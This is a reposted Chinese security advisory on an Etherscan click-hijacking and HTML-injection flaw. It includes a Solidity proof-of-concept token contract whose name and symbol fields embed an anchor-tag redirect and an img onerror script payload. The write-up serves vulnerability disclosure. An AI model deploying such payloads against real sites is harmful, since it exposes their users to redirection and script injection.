etherscan点击劫持漏洞

admin
admin
admin
139580
文章
114
评论
2021年9月8日10:43:34评论64 views字数 782阅读2分36秒阅读模式

点击蓝字  关注我们

01

漏洞描述

部署合约代币时,符合ERC20标准的情况下,symbol和name自定义,可嵌入a标签覆盖原本的标签。

在用户访问点击页面内的合约名字,可以劫持至任意网站。

02

漏洞详情

需要部署ERC20标准的合约,且在访问合约页面之前,发起一次交易。

https://ropsten.etherscan.io/address/0x701300f2f2c171c8c7c09e0fa09d6706a4fc7cd6#tokentxns

etherscan点击劫持漏洞

exp:

pragma solidity ^0.4.24;
contract MyTest {    mapping(address => uint256) balances;    uint256 public totalSupply;    mapping (address => mapping (address => uint256)) allowance;    address public owner;    string public name;    string public symbol;    uint8 public decimals = 18;    event Transfer(address indexed _from, address indexed _to, uint256 _value);    function MyTest() {        name = "<a href=http://baidu.com>12321</a>";        symbol = 'ok<img src=/ onerror=alert(1)> ';        totalSupply = 100000000000000000000000000000000000;    }    function mylog(address arg0, address arg1, uint256 arg2) public {        Transfer(arg0, arg1, arg2);    }}
etherscan点击劫持漏洞


本文始发于微信公众号(IDLab):etherscan点击劫持漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月8日10:43:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   etherscan点击劫持漏洞https://cn-sec.com/archives/358163.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息